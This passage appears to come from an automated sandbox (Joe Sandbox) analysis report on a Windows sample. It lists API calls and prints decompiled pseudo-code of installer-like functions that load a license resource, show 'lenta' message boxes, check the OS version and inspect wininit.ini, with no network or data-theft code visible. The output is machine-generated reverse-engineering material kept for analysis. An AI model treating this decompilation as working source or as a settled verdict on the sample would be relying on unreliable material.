                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F64,?,00000002,00000000), ref: 00973A5D
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00973AB3
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00973AD0
                                                                                                                                                                                                                                              • LocalFree.KERNEL32 ref: 00973B13
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FindResourceA.KERNEL32(00970000,000007D6,00000005), ref: 0097652A
                                                                                                                                                                                                                                                • Part of subcall function 00976517: LoadResource.KERNEL32(00970000,00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00976538
                                                                                                                                                                                                                                                • Part of subcall function 00976517: DialogBoxIndirectParamA.USER32(00970000,00000000,00000547,009719E0,00000000), ref: 00976557
                                                                                                                                                                                                                                                • Part of subcall function 00976517: FreeResource.KERNEL32(00000000,?,?,00972EE8,00000000,009719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00976560
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00973100,00000000,00000000), ref: 00973AF4
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$LICENSE
                                                                                                                                                                                                                                              • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                              • Opcode ID: 1501db8d900461b1d0c6c73d988f169995f353afccded63cc4cd14f962468482
                                                                                                                                                                                                                                              • Instruction ID: 3dea159cb9ef2229e4bf821752d03d42f70c5a4642e43f50cae4d5d5ae0d524d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1501db8d900461b1d0c6c73d988f169995f353afccded63cc4cd14f962468482
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611B7333582016BD7245F329C0AF2B3AADDBD5710B10C53EB94DD51E1DA798840B625
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E009724E0(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t7;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				long _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = __ebx;
                                                                                                                                                                                                                                              				_t7 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                                                              				_t25 = 0x104;
                                                                                                                                                                                                                                              				_t26 = 0;
                                                                                                                                                                                                                                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                              					E0097658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                                                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                                                              					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                                                              					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                                                              						_lclose(_t25);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00976CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x009724e0
                                                                                                                                                                                                                                              0x009724eb
                                                                                                                                                                                                                                              0x009724f2
                                                                                                                                                                                                                                              0x009724f7
                                                                                                                                                                                                                                              0x00972504
                                                                                                                                                                                                                                              0x0097250e
                                                                                                                                                                                                                                              0x0097251d
                                                                                                                                                                                                                                              0x0097252c
                                                                                                                                                                                                                                              0x00972541
                                                                                                                                                                                                                                              0x00972546
                                                                                                                                                                                                                                              0x00972553
                                                                                                                                                                                                                                              0x00972555
                                                                                                                                                                                                                                              0x00972555
                                                                                                                                                                                                                                              0x00972546
                                                                                                                                                                                                                                              0x0097256c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00972506
                                                                                                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0097252C
                                                                                                                                                                                                                                              • _lopen.KERNEL32 ref: 0097253B
                                                                                                                                                                                                                                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0097254C
                                                                                                                                                                                                                                              • _lclose.KERNEL32(00000000), ref: 00972555
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                              • String ID: wininit.ini
                                                                                                                                                                                                                                              • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                              • Opcode ID: 7be482bb1e6d2e403bfd32ba58c5f6a3e5e004d9ed44a2f2393987adfc72f19a
                                                                                                                                                                                                                                              • Instruction ID: c245cf227a5158a889a860d5a22dfb62c7ec25a9dace20d8d2def59a3dee0346
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7be482bb1e6d2e403bfd32ba58c5f6a3e5e004d9ed44a2f2393987adfc72f19a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3601B133614118ABC7209B699C0CEDFBB7DEBC6760F004555FA4DD3190DE748E85CAA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E009736EE(CHAR* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                                                              				signed int _v420;
                                                                                                                                                                                                                                              				signed int _v424;
                                                                                                                                                                                                                                              				CHAR* _v428;
                                                                                                                                                                                                                                              				CHAR* _v432;
                                                                                                                                                                                                                                              				signed int _v436;
                                                                                                                                                                                                                                              				CHAR* _v440;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                                              				CHAR* _t77;
                                                                                                                                                                                                                                              				CHAR* _t91;
                                                                                                                                                                                                                                              				CHAR* _t94;
                                                                                                                                                                                                                                              				int _t97;
                                                                                                                                                                                                                                              				CHAR* _t98;
                                                                                                                                                                                                                                              				signed char _t99;
                                                                                                                                                                                                                                              				CHAR* _t104;
                                                                                                                                                                                                                                              				signed short _t107;
                                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                                              				short _t113;
                                                                                                                                                                                                                                              				void* _t114;
                                                                                                                                                                                                                                              				signed char _t115;
                                                                                                                                                                                                                                              				short _t119;
                                                                                                                                                                                                                                              				CHAR* _t123;
                                                                                                                                                                                                                                              				CHAR* _t124;
                                                                                                                                                                                                                                              				CHAR* _t129;
                                                                                                                                                                                                                                              				signed int _t131;
                                                                                                                                                                                                                                              				signed int _t132;
                                                                                                                                                                                                                                              				CHAR* _t135;
                                                                                                                                                                                                                                              				CHAR* _t138;
                                                                                                                                                                                                                                              				signed int _t139;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t72 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                                                              				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              				_t115 = __ecx;
                                                                                                                                                                                                                                              				_t135 = 0;
                                                                                                                                                                                                                                              				_v432 = __ecx;
                                                                                                                                                                                                                                              				_t138 = 0;
                                                                                                                                                                                                                                              				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                                                              					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                                                              					_t119 = 2;
                                                                                                                                                                                                                                              					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                                                              					__eflags = _t77;
                                                                                                                                                                                                                                              					if(_t77 == 0) {
                                                                                                                                                                                                                                              						_t119 = 0;
                                                                                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                                                                                              						 *0x978184 = 1;
                                                                                                                                                                                                                                              						 *0x978180 = 1;
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						 *0x979a40 = _t119;
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						__eflags =  *0x978a34 - _t138; // 0x0
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _t115;
                                                                                                                                                                                                                                              						if(_t115 == 0) {
                                                                                                                                                                                                                                              							goto L66;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_v428 = _t135;
                                                                                                                                                                                                                                              						__eflags = _t119;
                                                                                                                                                                                                                                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                                                              						_t11 =  &_v420;
                                                                                                                                                                                                                                              						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                                                              						__eflags =  *_t11;
                                                                                                                                                                                                                                              						_v440 = _t115;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_v424 = _t135 * 0x18;
                                                                                                                                                                                                                                              							_v436 = E00972A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                                                              							_t91 = E00972A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                                                              							_t123 = _v436;
                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              										if(_t138 == _t133) {
                                                                                                                                                                                                                                              											L30:
                                                                                                                                                                                                                                              											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                              											_t115 = 0;
                                                                                                                                                                                                                                              											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                              											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              											_t133 = _v432;
                                                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                                                              												_t124 = _v440;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                              												_v420 =  &_v268;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t124;
                                                                                                                                                                                                                                              											if(_t124 == 0) {
                                                                                                                                                                                                                                              												_t135 = _v436;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t99 = _t124[0x30];
                                                                                                                                                                                                                                              												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                              												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                              												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              													asm("sbb ebx, ebx");
                                                                                                                                                                                                                                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                                              													_t115 = 0x104;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags =  *0x978a38 & 0x00000001;
                                                                                                                                                                                                                                              											if(( *0x978a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                              												L64:
                                                                                                                                                                                                                                              												_push(0);
                                                                                                                                                                                                                                              												_push(0x30);
                                                                                                                                                                                                                                              												_push(_v420);
                                                                                                                                                                                                                                              												_push("lenta");
                                                                                                                                                                                                                                              												goto L65;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												__eflags = _t135;
                                                                                                                                                                                                                                              												if(_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												__eflags =  *_t135;
                                                                                                                                                                                                                                              												if( *_t135 == 0) {
                                                                                                                                                                                                                                              													goto L64;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												MessageBeep(0);
                                                                                                                                                                                                                                              												_t94 = E0097681F(_t115);
                                                                                                                                                                                                                                              												__eflags = _t94;
                                                                                                                                                                                                                                              												if(_t94 == 0) {
                                                                                                                                                                                                                                              													L57:
                                                                                                                                                                                                                                              													0x180030 = 0x30;
                                                                                                                                                                                                                                              													L58:
                                                                                                                                                                                                                                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                                                                                                                                                                                              													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                                                              													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                                                              														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                                                              														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              															goto L66;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														__eflags = _t97 - 1;
                                                                                                                                                                                                                                              														L62:
                                                                                                                                                                                                                                              														if(__eflags == 0) {
                                                                                                                                                                                                                                              															_t138 = 0;
                                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                                              														goto L66;
                                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                                              													__eflags = _t97 - 6;
                                                                                                                                                                                                                                              													goto L62;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												_t98 = E009767C9(_t124, _t124);
                                                                                                                                                                                                                                              												__eflags = _t98;
                                                                                                                                                                                                                                              												if(_t98 == 0) {
                                                                                                                                                                                                                                              													goto L57;
                                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                                              												goto L58;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                                                              										if(_t138 == 0x54c) {
                                                                                                                                                                                                                                              											goto L30;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										__eflags = _t138;
                                                                                                                                                                                                                                              										if(_t138 == 0) {
                                                                                                                                                                                                                                              											goto L66;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t135 = 0;
                                                                                                                                                                                                                                              										__eflags = 0;
                                                                                                                                                                                                                                              										goto L44;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									L37:
                                                                                                                                                                                                                                              									_t129 = _v432;
                                                                                                                                                                                                                                              									__eflags = _t129[0x7c];
                                                                                                                                                                                                                                              									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t133 =  &_v268;
                                                                                                                                                                                                                                              									_t104 = E009728E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                                                              									__eflags = _t104;
                                                                                                                                                                                                                                              									if(_t104 != 0) {
                                                                                                                                                                                                                                              										goto L66;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t135 = _v428;
                                                                                                                                                                                                                                              									_t133 = 0x54d;
                                                                                                                                                                                                                                              									_t138 = 0x54d;
                                                                                                                                                                                                                                              									goto L40;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							if(_t91 > 0) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 != 0) {
                                                                                                                                                                                                                                              								__eflags = _t91;
                                                                                                                                                                                                                                              								if(_t91 != 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                                                              								L27:
                                                                                                                                                                                                                                              								if(__eflags <= 0) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								L28:
                                                                                                                                                                                                                                              								__eflags = _t135;
                                                                                                                                                                                                                                              								if(_t135 == 0) {
                                                                                                                                                                                                                                              									goto L33;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t138 = 0x54c;
                                                                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t91;
                                                                                                                                                                                                                                              							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                                                              							if(_t91 != 0) {
                                                                                                                                                                                                                                              								_t131 = _v424;
                                                                                                                                                                                                                                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                                                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                                                              									goto L37;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                              							_t109 = _v424;
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                                                              							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                              							_v428 = _t135;
                                                                                                                                                                                                                                              							_v420 = _t135;
                                                                                                                                                                                                                                              							__eflags = _t135 - 2;
                                                                                                                                                                                                                                              						} while (_t135 < 2);
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t77 == 1;
                                                                                                                                                                                                                                              					if(_t77 == 1) {
                                                                                                                                                                                                                                              						 *0x979a40 = _t119;
                                                                                                                                                                                                                                              						 *0x978184 = 1;
                                                                                                                                                                                                                                              						 *0x978180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0x979a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x978184 = _t135;
                                                                                                                                                                                                                                              							 *0x978180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E009744B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E00976CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x009736f9
                                                                                                                                                                                                                                              0x00973700
                                                                                                                                                                                                                                              0x0097370c
                                                                                                                                                                                                                                              0x00973716
                                                                                                                                                                                                                                              0x00973718
                                                                                                                                                                                                                                              0x0097371b
                                                                                                                                                                                                                                              0x00973721
                                                                                                                                                                                                                                              0x0097372b
                                                                                                                                                                                                                                              0x0097373d
                                                                                                                                                                                                                                              0x00973745
                                                                                                                                                                                                                                              0x00973746
                                                                                                                                                                                                                                              0x00973746
                                                                                                                                                                                                                                              0x00973749
                                                                                                                                                                                                                                              0x009737ab
                                                                                                                                                                                                                                              0x009737ad
                                                                                                                                                                                                                                              0x009737ae
                                                                                                                                                                                                                                              0x009737b3
                                                                                                                                                                                                                                              0x009737b8
                                                                                                                                                                                                                                              0x009737b8
                                                                                                                                                                                                                                              0x009737bf
                                                                                                                                                                                                                                              0x009737bf
                                                                                                                                                                                                                                              0x009737c5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737cb
                                                                                                                                                                                                                                              0x009737cd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009737d5
                                                                                                                                                                                                                                              0x009737db
                                                                                                                                                                                                                                              0x009737e8
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737ea
                                                                                                                                                                                                                                              0x009737f0
                                                                                                                                                                                                                                              0x009737f6
                                                                                                                                                                                                                                              0x00973805
                                                                                                                                                                                                                                              0x00973817
                                                                                                                                                                                                                                              0x0097382b
                                                                                                                                                                                                                                              0x00973830
                                                                                                                                                                                                                                              0x00973836
                                                                                                                                                                                                                                              0x0097383b
                                                                                                                                                                                                                                              0x0097383d
                                                                                                                                                                                                                                              0x009738eb
                                                                                                                                                                                                                                              0x009738eb
                                                                                                                                                                                                                                              0x009738f2
                                                                                                                                                                                                                                              0x0097390c
                                                                                                                                                                                                                                              0x00973911
                                                                                                                                                                                                                                              0x00973911
                                                                                                                                                                                                                                              0x00973913
                                                                                                                                                                                                                                              0x0097394d
                                                                                                                                                                                                                                              0x0097394d
                                                                                                                                                                                                                                              0x0097394f
                                                                                                                                                                                                                                              0x009738a9
                                                                                                                                                                                                                                              0x009738a9
                                                                                                                                                                                                                                              0x009738b0
                                                                                                                                                                                                                                              0x009738b2
                                                                                                                                                                                                                                              0x009738b9
                                                                                                                                                                                                                                              0x009738bb
                                                                                                                                                                                                                                              0x009738c1
                                                                                                                                                                                                                                              0x00973975
                                                                                                                                                                                                                                              0x009738c7
                                                                                                                                                                                                                                              0x009738de
                                                                                                                                                                                                                                              0x009738e0
                                                                                                                                                                                                                                              0x009738e0
                                                                                                                                                                                                                                              0x0097397b
                                                                                                                                                                                                                                              0x0097397d
                                                                                                                                                                                                                                              0x009739a9
                                                                                                                                                                                                                                              0x0097397f
                                                                                                                                                                                                                                              0x00973982
                                                                                                                                                                                                                                              0x0097398b
                                                                                                                                                                                                                                              0x0097398d
                                                                                                                                                                                                                                              0x0097398f
                                                                                                                                                                                                                                              0x0097399f
                                                                                                                                                                                                                                              0x009739a1
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x00973991
                                                                                                                                                                                                                                              0x0097398f
                                                                                                                                                                                                                                              0x009739af
                                                                                                                                                                                                                                              0x009739b6
                                                                                                                                                                                                                                              0x00973a0f
                                                                                                                                                                                                                                              0x00973a0f
                                                                                                                                                                                                                                              0x00973a11
                                                                                                                                                                                                                                              0x00973a13
                                                                                                                                                                                                                                              0x00973a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739b8
                                                                                                                                                                                                                                              0x009739b8
                                                                                                                                                                                                                                              0x009739ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739bc
                                                                                                                                                                                                                                              0x009739bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009739c3
                                                                                                                                                                                                                                              0x009739c9
                                                                                                                                                                                                                                              0x009739ce
                                                                                                                                                                                                                                              0x009739d0
                                                                                                                                                                                                                                              0x009739e3
                                                                                                                                                                                                                                              0x009739e5
                                                                                                                                                                                                                                              0x009739e6
                                                                                                                                                                                                                                              0x009739f1
                                                                                                                                                                                                                                              0x009739f7
                                                                                                                                                                                                                                              0x009739fa
                                                                                                                                                                                                                                              0x00973a01
                                                                                                                                                                                                                                              0x00973a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973a06
                                                                                                                                                                                                                                              0x00973a09
                                                                                                                                                                                                                                              0x00973a09
                                                                                                                                                                                                                                              0x00973a0b
                                                                                                                                                                                                                                              0x00973a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973a09
